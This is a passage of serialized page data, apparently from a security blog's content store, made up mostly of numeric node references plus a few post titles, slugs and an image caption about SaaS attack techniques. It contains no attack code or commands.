,{},[69599],{"data":69600,"marks":69601,"value":67247,"nodeType":864},{},[],{"items":69603},[69604],{"sys":69605,"name":6593},{"id":6592},{"items":69607},[69608],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":69609},{"url":4955},"blog/samljacking-a-poisoned-tenant",{"json":69612},{"data":69613,"content":69614,"nodeType":856},{},[69615],{"data":69616,"content":69617,"nodeType":860},{},[69618],{"data":69619,"marks":69620,"value":69621,"nodeType":864},{},[],"In this article, we’re going to demo combining two of our favorite new SaaS attack techniques to make a simple, but effective attack chain.",{"id":58881,"publishedAt":69623},"2026-08-12T11:56:03.038Z",{"items":69625},[69626,69628],{"sys":69627,"name":6593},{"id":6592},{"sys":69629,"name":342},{"id":6596},{"items":69631},[69632,69634,69636,69638,69640,69642,69644,69646],{"sys":69633,"name":279,"slug":280,"tier":31},{"id":276},{"sys":69635,"name":413,"slug":414,"tier":31},{"id":410},{"sys":69637,"name":545,"slug":546,"tier":31},{"id":542},{"sys":69639,"name":519,"slug":520,"tier":31},{"id":516},{"sys":69641,"name":324,"slug":325,"tier":45},{"id":321},{"sys":69643,"name":404,"slug":405,"tier":45},{"id":401},{"sys":69645,"name":607,"slug":608,"tier":45},{"id":604},{"sys":69647,"name":431,"slug":432,"tier":45},{"id":428},"5kzAmVR_ms60Me_ds0cIdRFmYd20kB0R62YCfmkH1m0",{"id":69650,"title":66798,"authorsCollection":69651,"content":69656,"extension":228,"faqItemsCollection":70335,"faqTitle":59,"featured":6,"hashTags":59,"meta":70337,"metaTitle":70338,"ogImage":59,"postType":5740,"publishedDate":66800,"relatedBlogPostsCollection":70339,"slug":66801,"stem":74487,"subtitle":59,"summary":74488,"synopsis":66799,"sys":74498,"tagsCollection":74500,"topicsCollection":74506,"__hash__":74536},"blog/blog/saas-attack-techniques.json",{"items":69652},[69653],{"fullName":10772,"firstName":10773,"jobTitle":10774,"socialLinks":69654,"profilePicture":69655},[21351],{"url":10776},{"json":69657,"links":70319},{"data":69658,"content":69659,"nodeType":856},{},[69660,69666,69672,69678,69684,69690,69696,69701,69717,69723,69759,69765,69771,69807,69823,69829,69835,69841,69857,69873,69879,69909,69915,69931,69937,69943,69969,69985,69991,69996,70002,70008,70014,70020,70026,70032,70038,70044,70050,70056,70062,70068,70081,70087,70143,70149,70155,70178,70191,70197,70203,70209,70235,70252,70258,70264,70270,70276,70292,70308,70313],{"data":69661,"content":69662,"nodeType":860},{},[69663],{"data":69664,"marks":69665,"value":66027,"nodeType":864},{},[],{"data":69667,"content":69668,"nodeType":860},{},[69669],{"data":69670,"marks":69671,"value":66034,"nodeType":864},{},[],{"data":69673,"content":69674,"nodeType":860},{},[69675],{"data":69676,"marks":69677,"value":66041,"nodeType":864},{},[],{"data":69679,"content":69680,"nodeType":860},{},[69681],{"data":69682,"marks":69683,"value":66048,"nodeType":864},{},[],{"data":69685,"content":69686,"nodeType":1009},{},[69687],{"data":69688,"marks":69689,"value":66055,"nodeType":864},{},[],{"data":69691,"content":69692,"nodeType":860},{},[69693],{"data":69694,"marks":69695,"value":66062,"nodeType":864},{},[],{"data":69697,"content":69700,"nodeType":996},{"target":69698},{"sys":69699},{"id":66067,"type":1001,"linkType":1002},[],{"data":69702,"content":69703,"nodeType":860},{},[69704,69707,69714],{"data":69705,"marks":69706,"value":66075,"nodeType":864},{},[],{"data":69708,"content":69709,"nodeType":883},{"uri":6418},[69710],{"data":69711,"marks":69712,"value":6423,"nodeType":864},{},[69713],{"type":1455},{"data":69715,"marks":69716,"value":2924,"nodeType":864},{},[],{"data":69718,"content":69719,"nodeType":860},{},[69720],{"data":69721,"marks":69722,"value":66092,"nodeType":864},{},[],{"data":69724,"content":69725,"nodeType":860},{},[69726,69729,69736,69739,69746,69749,69756],{"data":69727,"marks":69728,"value":66099,"nodeType":864},{},[],{"data":69730,"content":69731,"nodeType":883},{"uri":48092},[69732],{"data":69733,"marks":69734,"value":66107,"nodeType":864},{},[69735],{"type":1455},{"data":69737,"marks":69738,"value":902,"nodeType":864},{},[],{"data":69740,"content":69741,"nodeType":883},{"uri":57775},[69742],{"data":69743,"marks":69744,"value":66118,"nodeType":864},{},[69745],{"type":1455},{"data":69747,"marks":69748,"value":66122,"nodeType":864},{},[],{"data":69750,"content":69751,"nodeType":883},{"uri":66125},[69752],{"data":69753,"marks":69754,"value":66131,"nodeType":864},{},[69755],{"type":1455},{"data":69757,"marks":69758,"value":66135,"nodeType":864},{},[],{"data":69760,"content":69761,"nodeType":860},{},[69762],{"data":69763,"marks":69764,"value":66142,"nodeType":864},{},[],{"data":69766,"content":69767,"nodeType":1312},{},[69768],{"data":69769,"marks":69770,"value":66149,"nodeType":864},{},[],{"data":69772,"content":69773,"nodeType":860},{},[69774,69777,69784,69787,69794,69797,69804],{"data":69775,"marks":69776,"value":66156,"nodeType":864},{},[],{"data":69778,"content":69779,"nodeType":883},{"uri":66159},[69780],{"data":69781,"marks":69782,"value":66165,"nodeType":864},{},[69783],{"type":1455},{"data":69785,"marks":69786,"value":902,"nodeType":864},{},[],{"data":69788,"content":69789,"nodeType":883},{"uri":66171},[69790],{"data":69791,"marks":69792,"value":66177,"nodeType":864},{},[69793],{"type":1455},{"data":69795,"marks":69796,"value":66181,"nodeType":864},{},[],{"data":69798,"content":69799,"nodeType":883},{"uri":57755},[69800],{"data":69801,"marks":69802,"value":66189,"nodeType":864},{},[69803],{"type":1455},{"data":69805,"marks":69806,"value":66193,"nodeType":864},{},[],{"data":69808,"content":69809,"nodeType":860},{},[69810,69813,69820],{"data":69811,"marks":69812,"value":66200,"nodeType":864},{},[],{"data":69814,"content":69815,"nodeType":883},{"uri":58605},[69816],{"data":69817,"marks":69818,"value":66208,"nodeType":864},{},[69819],{"type":1455},{"data":69821,"marks":69822,"value":66212,"nodeType":864},{},[],{"data":69824,"content":69825,"nodeType":860},{},[69826],{"data":69827,"marks":69828,"value":66219,"nodeType":864},{},[],{"data":69830,"content":69831,"nodeType":860},{},[69832],{"data":69833,"marks":69834,"value":66226,"nodeType":864},{},[],{"data":69836,"content":69837,"nodeType":1312},{},[69838],{"data":69839,"marks":69840,"value":66233,"nodeType":864},{},[],{"data":69842,"content":69843,"nodeType":860},{},[69844,69847,69854],{"data":69845,"marks":69846,"value":66240,"nodeType":864},{},[],{"data":69848,"content":69849,"nodeType":883},{"uri":66243},[69850],{"data":69851,"marks":69852,"value":66249,"nodeType":864},{},[69853],{"type":1455},{"data":69855,"marks":69856,"value":66253,"nodeType":864},{},[],{"data":69858,"content":69859,"nodeType":860},{},[69860,69863,69870],{"data":69861,"marks":69862,"value":66260,"nodeType":864},{},[],{"data":69864,"content":69865,"nodeType":883},{"uri":59957},[69866],{"data":69867,"marks":69868,"value":62172,"nodeType":864},{},[69869],{"type":1455},{"data":69871,"marks":69872,"value":66271,"nodeType":864},{},[],{"data":69874,"content":69875,"nodeType":860},{},[69876],{"data":69877,"marks":69878,"value":66278,"nodeType":864},{},[],{"data":69880,"content":69881,"nodeType":941},{},[69882,69891,69900],{"data":69883,"content":69884,"nodeType":945},{},[69885],{"data":69886,"content":69887,"nodeType":860},{},[69888],{"data":69889,"marks":69890,"value":66291,"nodeType":864},{},[],{"data":69892,"content":69893,"nodeType":945},{},[69894],{"data":69895,"content":69896,"nodeType":860},{},[69897],{"data":69898,"marks":69899,"value":66301,"nodeType":864},{},[],{"data":69901,"content":69902,"nodeType":945},{},[69903],{"data":69904,"content":69905,"nodeType":860},{},[69906],{"data":69907,"marks":69908,"value":66311,"nodeType":864},{},[],{"data":69910,"content":69911,"nodeType":860},{},[69912],{"data":69913,"marks":69914,"value":66318,"nodeType":864},{},[],{"data":69916,"content":69917,"nodeType":860},{},[69918,69921,69928],{"data":69919,"marks":69920,"value":66325,"nodeType":864},{},[],{"data":69922,"content":69923,"nodeType":883},{"uri":39722},[69924],{"data":69925,"marks":69926,"value":60979,"nodeType":864},{},[69927],{"type":1455},{"data":69929,"marks":69930,"value":66336,"nodeType":864},{},[],{"data":69932,"content":69933,"nodeType":1312},{},[69934],{"data":69935,"marks":69936,"value":66343,"nodeType":864},{},[],{"data":69938,"content":69939,"nodeType":860},{},[69940],{"data":69941,"marks":69942,"value":66350,"nodeType":864},{},[],{"data":69944,"content":69945,"nodeType":860},{},[69946,69949,69956,69959,69966],{"data":69947,"marks":69948,"value":66357,"nodeType":864},{},[],{"data":69950,"content":69951,"nodeType":883},{"uri":66360},[69952],{"data":69953,"marks":69954,"value":66366,"nodeType":864},{},[69955],{"type":1455},{"data":69957,"marks":69958,"value":902,"nodeType":864},{},[],{"data":69960,"content":69961,"nodeType":883},{"uri":19131},[69962],{"data":69963,"marks":69964,"value":19137,"nodeType":864},{},[69965],{"type":1455},{"data":69967,"marks":69968,"value":66380,"nodeType":864},{},[],{"data":69970,"content":69971,"nodeType":860},{},[69972,69975,69982],{"data":69973,"marks":69974,"value":66387,"nodeType":864},{},[],{"data":69976,"content":69977,"nodeType":883},{"uri":66390},[69978],{"data":69979,"marks":69980,"value":66396,"nodeType":864},{},[69981],{"type":1455},{"data":69983,"marks":69984,"value":66400,"nodeType":864},{},[],{"data":69986,"content":69987,"nodeType":860},{},[69988],{"data":69989,"marks":69990,"value":66407,"nodeType":864},{},[],{"data":69992,"content":69995,"nodeType":996},{"target":69993},{"sys":69994},{"id":57916,"type":1001,"linkType":1002},[],{"data":69997,"content":69998,"nodeType":1009},{},[69999],{"data":70000,"marks":70001,"value":66419,"nodeType":864},{},[],{"data":70003,"content":70004,"nodeType":860},{},[70005],{"data":70006,"marks":70007,"value":66426,"nodeType":864},{},[],{"data":70009,"content":70010,"nodeType":860},{},[70011],{"data":70012,"marks":70013,"value":66433,"nodeType":864},{},[],{"data":70015,"content":70016,"nodeType":1312},{},[70017],{"data":70018,"marks":70019,"value":66440,"nodeType":864},{},[],{"data":70021,"content":70022,"nodeType":860},{},[70023],{"data":70024,"marks":70025,"value":66447,"nodeType":864},{},[],{"data":70027,"content":70028,"nodeType":860},{},[70029],{"data":70030,"marks":70031,"value":66454,"nodeType":864},{},[],{"data":70033,"content":70034,"nodeType":860},{},[70035],{"data":70036,"marks":70037,"value":66461,"nodeType":864},{},[],{"data":70039,"content":70040,"nodeType":1312},{},[70041],{"data":70042,"marks":70043,"value":66468,"nodeType":864},{},[],{"data":70045,"content":70046,"nodeType":860},{},[70047],{"data":70048,"marks":70049,"value":66475,"nodeType":864},{},[],{"data":70051,"content":70052,"nodeType":860},{},[70053],{"data":70054,"marks":70055,"value":66482,"nodeType":864},{},[],{"data":70057,"content":70058,"nodeType":860},{},[70059],{"data":70060,"marks":70061,"value":66489,"nodeType":864},{},[],{"data":70063,"content":70064,"nodeType":1009},{},[70065],{"data":70066,"marks":70067,"value":66496,"nodeType":864},{},[],{"data":70069,"content":70070,"nodeType":860},{},[70071,70074,70078],{"data":70072,"marks":70073,"value":66503,"nodeType":864},{},[],{"data":70075,"marks":70076,"value":66508,"nodeType":864},{},[70077],{"type":2246},{"data":70079,"marks":70080,"value":66512,"nodeType":864},{},[],{"data":70082,"content":70083,"nodeType":1312},{},[70084],{"data":70085,"marks":70086,"value":66519,"nodeType":864},{},[],{"data":70088,"content":70089,"nodeType":860},{},[70090,70093,70100,70103,70110,70113,70120,70123,70130,70133,70140],{"data":70091,"marks":70092,"value":66526,"nodeType":864},{},[],{"data":70094,"content":70095,"nodeType":883},{"uri":66529},[70096],{"data":70097,"marks":70098,"value":66535,"nodeType":864},{},[70099],{"type":1455},{"data":70101,"marks":70102,"value":902,"nodeType":864},{},[],{"data":70104,"content":70105,"nodeType":883},{"uri":66541},[70106],{"data":70107,"marks":70108,"value":66547,"nodeType":864},{},[70109],{"type":1455},{"data":70111,"marks":70112,"value":66551,"nodeType":864},{},[],{"data":70114,"content":70115,"nodeType":883},{"uri":66554},[70116],{"data":70117,"marks":70118,"value":66560,"nodeType":864},{},[70119],{"type":1455},{"data":70121,"marks":70122,"value":66564,"nodeType":864},{},[],{"data":70124,"content":70125,"nodeType":883},{"uri":19589},[70126],{"data":70127,"marks":70128,"value":66572,"nodeType":864},{},[70129],{"type":1455},{"data":70131,"marks":70132,"value":66576,"nodeType":864},{},[],{"data":70134,"content":70135,"nodeType":883},{"uri":66579},[70136],{"data":70137,"marks":70138,"value":66585,"nodeType":864},{},[70139],{"type":1455},{"data":70141,"marks":70142,"value":66589,"nodeType":864},{},[],{"data":70144,"content":70145,"nodeType":860},{},[70146],{"data":70147,"marks":70148,"value":66596,"nodeType":864},{},[],{"data":70150,"content":70151,"nodeType":1312},{},[70152],{"data":70153,"marks":70154,"value":66603,"nodeType":864},{},[],{"data":70156,"content":70157,"nodeType":860},{},[70158,70161,70165,70168,70175],{"data":70159,"marks":70160,"value":66610,"nodeType":864},{},[],{"data":70162,"marks":70163,"value":66615,"nodeType":864},{},[70164],{"type":1455},{"data":70166,"marks":70167,"value":66619,"nodeType":864},{},[],{"data":70169,"content":70170,"nodeType":883},{"uri":66622},[70171],{"data":70172,"marks":70173,"value":66628,"nodeType":864},{},[70174],{"type":1455},{"data":70176,"marks":70177,"value":66632,"nodeType":864},{},[],{"data":70179,"content":70180,"nodeType":860},{},[70181,70184,70188],{"data":70182,"marks":70183,"value":66639,"nodeType":864},{},[],{"data":70185,"marks":70186,"value":66644,"nodeType":864},{},[70187],{"type":2246},{"data":70189,"marks":70190,"value":2924,"nodeType":864},{},[],{"data":70192,"content":70193,"nodeType":860},{},[70194],{"data":70195,"marks":70196,"value":66654,"nodeType":864},{},[],{"data":70198,"content":70199,"nodeType":1312},{},[70200],{"data":70201,"marks":70202,"value":66661,"nodeType":864},{},[],{"data":70204,"content":70205,"nodeType":860},{},[70206],{"data":70207,"marks":70208,"value":66668,"nodeType":864},{},[],{"data":70210,"content":70211,"nodeType":860},{},[70212,70215,70222,70225,70232],{"data":70213,"marks":70214,"value":66675,"nodeType":864},{},[],{"data":70216,"content":70217,"nodeType":883},{"uri":66678},[70218],{"data":70219,"marks":70220,"value":66684,"nodeType":864},{},[70221],{"type":1455},{"data":70223,"marks":70224,"value":66688,"nodeType":864},{},[],{"data":70226,"content":70227,"nodeType":883},{"uri":66691},[70228],{"data":70229,"marks":70230,"value":66697,"nodeType":864},{},[70231],{"type":1455},{"data":70233,"marks":70234,"value":66701,"nodeType":864},{},[],{"data":70236,"content":70237,"nodeType":860},{},[70238,70241,70249],{"data":70239,"marks":70240,"value":66708,"nodeType":864},{},[],{"data":70242,"content":70243,"nodeType":883},{"uri":66711},[70244],{"data":70245,"marks":70246,"value":66718,"nodeType":864},{},[70247,70248],{"type":1455},{"type":2246},{"data":70250,"marks":70251,"value":21,"nodeType":864},{},[],{"data":70253,"content":70254,"nodeType":860},{},[70255],{"data":70256,"marks":70257,"value":66728,"nodeType":864},{},[],{"data":70259,"content":70260,"nodeType":1009},{},[70261],{"data":70262,"marks":70263,"value":66735,"nodeType":864},{},[],{"data":70265,"content":70266,"nodeType":860},{},[70267],{"data":70268,"marks":70269,"value":66742,"nodeType":864},{},[],{"data":70271,"content":70272,"nodeType":860},{},[70273],{"data":70274,"marks":70275,"value":66749,"nodeType":864},{},[],{"data":70277,"content":70278,"nodeType":860},{},[70279,70282,70289],{"data":70280,"marks":70281,"value":66756,"nodeType":864},{},[],{"data":70283,"content":70284,"nodeType":883},{"uri":66759},[70285],{"data":70286,"marks":70287,"value":66765,"nodeType":864},{},[70288],{"type":1455},{"data":70290,"marks":70291,"value":2924,"nodeType":864},{},[],{"data":70293,"content":70294,"nodeType":860},{},[70295,70298,70305],{"data":70296,"marks":70297,"value":66775,"nodeType":864},{},[],{"data":70299,"content":70300,"nodeType":883},{"uri":6418},[70301],{"data":70302,"marks":70303,"value":6423,"nodeType":864},{},[70304],{"type":1455},{"data":70306,"marks":70307,"value":66786,"nodeType":864},{},[],{"data":70309,"content":70312,"nodeType":996},{"target":70310},{"sys":70311},{"id":58370,"type":1001,"linkType":1002},[],{"data":70314,"content":70315,"nodeType":860},{},[70316],{"data":70317,"marks":70318,"value":21,"nodeType":864},{},[],{"entries":70320},{"hyperlink":70321,"inline":70322,"block":70323},[],[],[70324,70331,70333],{"sys":70325,"__typename":1724,"title":5765,"caption":70326,"layoutMode":70327,"file":70328},{"id":66067},"SaaS attack matrix demonstrated networkless attacks that bypass EDR and network detection","Centre aligned",{"url":70329,"width":70330,"height":67737},"https://images.ctfassets.net/y1cdw1ablpvd/3UQoGrBeM5nF6Hya80S92f/541273f45d41a07363dff5523d284cdf/Screenshot_2024-06-05_at_09.56.39.png",2278,{"sys":70332,"__typename":1717,"type":58393,"ctaText":58394,"buttonLabel":58395,"buttonColour":1721,"buttonUrl":59},{"id":57916},{"sys":70334,"__typename":1717,"type":58474,"ctaText":58475,"buttonLabel":58476,"buttonColour":56131,"buttonUrl":59},{"id":58370},{"items":70336},[],{},"SaaS attack techniques",{"items":70340},[70341,71112,71518],{"__typename":2059,"sys":70342,"content":70343,"title":61741,"synopsis":60873,"hashTags":59,"publishedDate":61742,"slug":61743,"tagsCollection":71102,"authorsCollection":71108},{"id":60862},{"json":70344},{"data":70345,"content":70346,"nodeType":856},{},[70347,70353,70359,70387,70393,70399,70415,70421,70427,70433,70457,70463,70469,70482,70488,70494,70524,70530,70536,70542,70548,70554,70559,70565,70571,70577,70584,70590,70606,70612,70618,70624,70630,70636,70642,70648,70654,70660,70665,70671,70687,70693,70709,70714,70719,70724,70730,70736,70742,70747,70752,70758,70764,70770,70776,70782,70787,70803,70819,70825,70830,70835,70841,70847,70853,70859,70880,70885,70890,70896,70902,70908,70918,70923,70929,70934,70939,70945,70951,70957,70962,70967,70973,70979,71084,71090,71096],{"data":70348,"content":70349,"nodeType":860},{},[70350],{"data":70351,"marks":70352,"value":60873,"nodeType":864},{},[],{"data":70354,"content":70355,"nodeType":860},{},[70356],{"data":70357,"marks":70358,"value":60880,"nodeType":864},{},[],{"data":70360,"content":70361,"nodeType":860},{},[70362,70365,70372,70375,70384],{"data":70363,"marks":70364,"value":60887,"nodeType":864},{},[],{"data":70366,"content":70367,"nodeType":883},{"uri":6418},[70368],{"data":70369,"marks":70370,"value":5765,"nodeType":864},{},[70371],{"type":1455},{"data":70373,"marks":70374,"value":60898,"nodeType":864},{},[],{"data":70376,"content":70379,"nodeType":57700},{"target":70377},{"sys":70378},{"id":58881,"type":1001,"linkType":1002},[70380],{"data":70381,"marks":70382,"value":5236,"nodeType":864},{},[70383],{"type":1455},{"data":70385,"marks":70386,"value":10094,"nodeType":864},{},[],{"data":70388,"content":70389,"nodeType":860},{},[70390],{"data":70391,"marks":70392,"value":60917,"nodeType":864},{},[],{"data":70394,"content":70395,"nodeType":1009},{},[70396],{"data":70397,"marks":70398,"value":60924,"nodeType":864},{},[],{"data":70400,"content":70401,"nodeType":860},{},[70402,70405,70412],{"data":70403,"marks":70404,"value":60931,"nodeType":864},{},[],{"data":70406,"content":70407,"nodeType":883},{"uri":59957},[70408],{"data":70409,"marks":70410,"value":60939,"nodeType":864},{},[70411],{"type":1455},{"data":70413,"marks":70414,"value":60943,"nodeType":864},{},[],{"data":70416,"content":70417,"nodeType":860},{},[70418],{"data":70419,"marks":70420,"value":60950,"nodeType":864},{},[],{"data":70422,"content":70423,"nodeType":1009},{},[70424],{"data":70425,"marks":70426,"value":60957,"nodeType":864},{},[],{"data":70428,"content":70429,"nodeType":860},{},[70430],{"data":70431,"marks":70432,"value":60964,"nodeType":864},{},[],{"data":70434,"content":70435,"nodeType":860},{},[70436,70439,70446,70449,70454],{"data":70437,"marks":70438,"value":60971,"nodeType":864},{},[],{"data":70440,"content":70441,"nodeType":883},{"uri":39722},[70442],{"data":70443,"marks":70444,"value":60979,"nodeType":864},{},[70445],{"type":1455},{"data":70447,"marks":70448,"value":60983,"nodeType":864},{},[],{"data":70450,"marks":70451,"value":60989,"nodeType":864},{},[70452,70453],{"type":2246},{"type":899},{"data":70455,"marks":70456,"value":60993,"nodeType":864},{},[],{"data":70458,"content":70459,"nodeType":1009},{},[70460],{"data":70461,"marks":70462,"value":60484,"nodeType":864},{},[],{"data":70464,"content":70465,"nodeType":860},{},[70466],{"data":70467,"marks":70468,"value":61006,"nodeType":864},{},[],{"data":70470,"content":70471,"nodeType":860},{},[70472,70475,70479],{"data":70473,"marks":70474,"value":61013,"nodeType":864},{},[],{"data":70476,"marks":70477,"value":61018,"nodeType":864},{},[70478],{"type":1455},{"data":70480,"marks":70481,"value":61022,"nodeType":864},{},[],{"data":70483,"content":70484,"nodeType":860},{},[70485],{"data":70486,"marks":70487,"value":61029,"nodeType":864},{},[],{"data":70489,"content":70490,"nodeType":860},{},[70491],{"data":70492,"marks":70493,"value":61036,"nodeType":864},{},[],{"data":70495,"content":70496,"nodeType":61070},{},[70497,70506,70515],{"data":70498,"content":70499,"nodeType":945},{},[70500],{"data":70501,"content":70502,"nodeType":860},{},[70503],{"data":70504,"marks":70505,"value":61049,"nodeType":864},{},[],{"data":70507,"content":70508,"nodeType":945},{},[70509],{"data":70510,"content":70511,"nodeType":860},{},[70512],{"data":70513,"marks":70514,"value":61059,"nodeType":864},{},[],{"data":70516,"content":70517,"nodeType":945},{},[70518],{"data":70519,"content":70520,"nodeType":860},{},[70521],{"data":70522,"marks":70523,"value":61069,"nodeType":864},{},[],{"data":70525,"content":70526,"nodeType":1312},{},[70527],{"data":70528,"marks":70529,"value":61077,"nodeType":864},{},[],{"data":70531,"content":70532,"nodeType":860},{},[70533],{"data":70534,"marks":70535,"value":61084,"nodeType":864},{},[],{"data":70537,"content":70538,"nodeType":860},{},[70539],{"data":70540,"marks":70541,"value":61091,"nodeType":864},{},[],{"data":70543,"content":70544,"nodeType":860},{},[70545],{"data":70546,"marks":70547,"value":61098,"nodeType":864},{},[],{"data":70549,"content":70550,"nodeType":860},{},[70551],{"data":70552,"marks":70553,"value":61105,"nodeType":864},{},[],{"data":70555,"content":70558,"nodeType":996},{"target":70556},{"sys":70557},{"id":61110,"type":1001,"linkType":1002},[],{"data":70560,"content":70561,"nodeType":1312},{},[70562],{"data":70563,"marks":70564,"value":61118,"nodeType":864},{},[],{"data":70566,"content":70567,"nodeType":860},{},[70568],{"data":70569,"marks":70570,"value":61125,"nodeType":864},{},[],{"data":70572,"content":70573,"nodeType":860},{},[70574],{"data":70575,"marks":70576,"value":61132,"nodeType":864},{},[],{"data":70578,"content":70579,"nodeType":860},{},[70580],{"data":70581,"marks":70582,"value":61140,"nodeType":864},{},[70583],{"type":899},{"data":70585,"content":70586,"nodeType":1312},{},[70587],{"data":70588,"marks":70589,"value":61147,"nodeType":864},{},[],{"data":70591,"content":70592,"nodeType":860},{},[70593,70596,70603],{"data":70594,"marks":70595,"value":61154,"nodeType":864},{},[],{"data":70597,"content":70598,"nodeType":883},{"uri":61157},[70599],{"data":70600,"marks":70601,"value":61163,"nodeType":864},{},[70602],{"type":1455},{"data":70604,"marks":70605,"value":61167,"nodeType":864},{},[],{"data":70607,"content":70608,"nodeType":860},{},[70609],{"data":70610,"marks":70611,"value":61174,"nodeType":864},{},[],{"data":70613,"content":70614,"nodeType":860},{},[70615],{"data":70616,"marks":70617,"value":61181,"nodeType":864},{},[],{"data":70619,"content":70620,"nodeType":1009},{},[70621],{"data":70622,"marks":70623,"value":61188,"nodeType":864},{},[],{"data":70625,"content":70626,"nodeType":860},{},[70627],{"data":70628,"marks":70629,"value":61195,"nodeType":864},{},[],{"data":70631,"content":70632,"nodeType":860},{},[70633],{"data":70634,"marks":70635,"value":61202,"nodeType":864},{},[],{"data":70637,"content":70638,"nodeType":860},{},[70639],{"data":70640,"marks":70641,"value":61209,"nodeType":864},{},[],{"data":70643,"content":70644,"nodeType":860},{},[70645],{"data":70646,"marks":70647,"value":61216,"nodeType":864},{},[],{"data":70649,"content":70650,"nodeType":860},{},[70651],{"data":70652,"marks":70653,"value":61223,"nodeType":864},{},[],{"data":70655,"content":70656,"nodeType":860},{},[70657],{"data":70658,"marks":70659,"value":61230,"nodeType":864},{},[],{"data":70661,"content":70664,"nodeType":996},{"target":70662},{"sys":70663},{"id":61235,"type":1001,"linkType":1002},[],{"data":70666,"content":70667,"nodeType":1009},{},[70668],{"data":70669,"marks":70670,"value":61243,"nodeType":864},{},[],{"data":70672,"content":70673,"nodeType":860},{},[70674,70677,70684],{"data":70675,"marks":70676,"value":61250,"nodeType":864},{},[],{"data":70678,"content":70679,"nodeType":883},{"uri":61253},[70680],{"data":70681,"marks":70682,"value":61259,"nodeType":864},{},[70683],{"type":1455},{"data":70685,"marks":70686,"value":61263,"nodeType":864},{},[],{"data":70688,"content":70689,"nodeType":1312},{},[70690],{"data":70691,"marks":70692,"value":61270,"nodeType":864},{},[],{"data":70694,"content":70695,"nodeType":860},{},[70696,70699,70706],{"data":70697,"marks":70698,"value":61277,"nodeType":864},{},[],{"data":70700,"content":70701,"nodeType":883},{"uri":61280},[70702],{"data":70703,"marks":70704,"value":61280,"nodeType":864},{},[70705],{"type":1455},{"data":70707,"marks":70708,"value":61289,"nodeType":864},{},[],{"data":70710,"content":70713,"nodeType":996},{"target":70711},{"sys":70712},{"id":61294,"type":1001,"linkType":1002},[],{"data":70715,"content":70718,"nodeType":996},{"target":70716},{"sys":70717},{"id":61300,"type":1001,"linkType":1002},[],{"data":70720,"content":70723,"nodeType":996},{"target":70721},{"sys":70722},{"id":61306,"type":1001,"linkType":1002},[],{"data":70725,"content":70726,"nodeType":1312},{},[70727],{"data":70728,"marks":70729,"value":61314,"nodeType":864},{},[],{"data":70731,"content":70732,"nodeType":860},{},[70733],{"data":70734,"marks":70735,"value":61321,"nodeType":864},{},[],{"data":70737,"content":70738,"nodeType":860},{},[70739],{"data":70740,"marks":70741,"value":61328,"nodeType":864},{},[],{"data":70743,"content":70746,"nodeType":996},{"target":70744},{"sys":70745},{"id":61333,"type":1001,"linkType":1002},[],{"data":70748,"content":70751,"nodeType":996},{"target":70749},{"sys":70750},{"id":61339,"type":1001,"linkType":1002},[],{"data":70753,"content":70754,"nodeType":1009},{},[70755],{"data":70756,"marks":70757,"value":61347,"nodeType":864},{},[],{"data":70759,"content":70760,"nodeType":860},{},[70761],{"data":70762,"marks":70763,"value":61354,"nodeType":864},{},[],{"data":70765,"content":70766,"nodeType":860},{},[70767],{"data":70768,"marks":70769,"value":61361,"nodeType":864},{},[],{"data":70771,"content":70772,"nodeType":1312},{},[70773],{"data":70774,"marks":70775,"value":61368,"nodeType":864},{},[],{"data":70777,"content":70778,"nodeType":860},{},[70779],{"data":70780,"marks":70781,"value":61375,"nodeType":864},{},[],{"data":70783,"content":70786,"nodeType":996},{"target":70784},{"sys":70785},{"id":61380,"type":1001,"linkType":1002},[],{"data":70788,"content":70789,"nodeType":860},{},[70790,70793,70800],{"data":70791,"marks":70792,"value":61388,"nodeType":864},{},[],{"data":70794,"content":70795,"nodeType":883},{"uri":60804},[70796],{"data":70797,"marks":70798,"value":60810,"nodeType":864},{},[70799],{"type":1455},{"data":70801,"marks":70802,"value":61399,"nodeType":864},{},[],{"data":70804,"content":70805,"nodeType":860},{},[70806,70809,70816],{"data":70807,"marks":70808,"value":61406,"nodeType":864},{},[],{"data":70810,"content":70811,"nodeType":883},{"uri":61409},[70812],{"data":70813,"marks":70814,"value":61415,"nodeType":864},{},[70815],{"type":1455},{"data":70817,"marks":70818,"value":61419,"nodeType":864},{},[],{"data":70820,"content":70821,"nodeType":860},{},[70822],{"data":70823,"marks":70824,"value":61426,"nodeType":864},{},[],{"data":70826,"content":70829,"nodeType":996},{"target":70827},{"sys":70828},{"id":61431,"type":1001,"linkType":1002},[],{"data":70831,"content":70834,"nodeType":996},{"target":70832},{"sys":70833},{"id":61437,"type":1001,"linkType":1002},[],{"data":70836,"content":70837,"nodeType":860},{},[70838],{"data":70839,"marks":70840,"value":61445,"nodeType":864},{},[],{"data":70842,"content":70843,"nodeType":1312},{},[70844],{"data":70845,"marks":70846,"value":61452,"nodeType":864},{},[],{"data":70848,"content":70849,"nodeType":860},{},[70850],{"data":70851,"marks":70852,"value":61459,"nodeType":864},{},[],{"data":70854,"content":70855,"nodeType":860},{},[70856],{"data":70857,"marks":70858,"value":61466,"nodeType":864},{},[],{"data":70860,"content":70861,"nodeType":941},{},[70862,70871],{"data":70863,"content":70864,"nodeType":945},{},[70865],{"data":70866,"content":70867,"nodeType":860},{},[70868],{"data":70869,"marks":70870,"value":61479,"nodeType":864},{},[],{"data":70872,"content":70873,"nodeType":945},{},[70874],{"data":70875,"content":70876,"nodeType":860},{},[70877],{"data":70878,"marks":70879,"value":61489,"nodeType":864},{},[],{"data":70881,"content":70884,"nodeType":996},{"target":70882},{"sys":70883},{"id":61494,"type":1001,"linkType":1002},[],{"data":70886,"content":70889,"nodeType":996},{"target":70887},{"sys":70888},{"id":61500,"type":1001,"linkType":1002},[],{"data":70891,"content":70892,"nodeType":860},{},[70893],{"data":70894,"marks":70895,"value":61508,"nodeType":864},{},[],{"data":70897,"content":70898,"nodeType":860},{},[70899],{"data":70900,"marks":70901,"value":61515,"nodeType":864},{},[],{"data":70903,"content":70904,"nodeType":860},{},[70905],{"data":70906,"marks":70907,"value":61522,"nodeType":864},{},[],{"data":70909,"content":70910,"nodeType":860},{},[70911,70914],{"data":70912,"marks":70913,"value":61529,"nodeType":864},{},[],{"data":70915,"marks":70916,"value":14717,"nodeType":864},{},[70917],{"type":2246},{"data":70919,"content":70922,"nodeType":996},{"target":70920},{"sys":70921},{"id":61538,"type":1001,"linkType":1002},[],{"data":70924,"content":70925,"nodeType":860},{},[70926],{"data":70927,"marks":70928,"value":61546,"nodeType":864},{},[],{"data":70930,"content":70933,"nodeType":996},{"target":70931},{"sys":70932},{"id":61551,"type":1001,"linkType":1002},[],{"data":70935,"content":70938,"nodeType":996},{"target":7093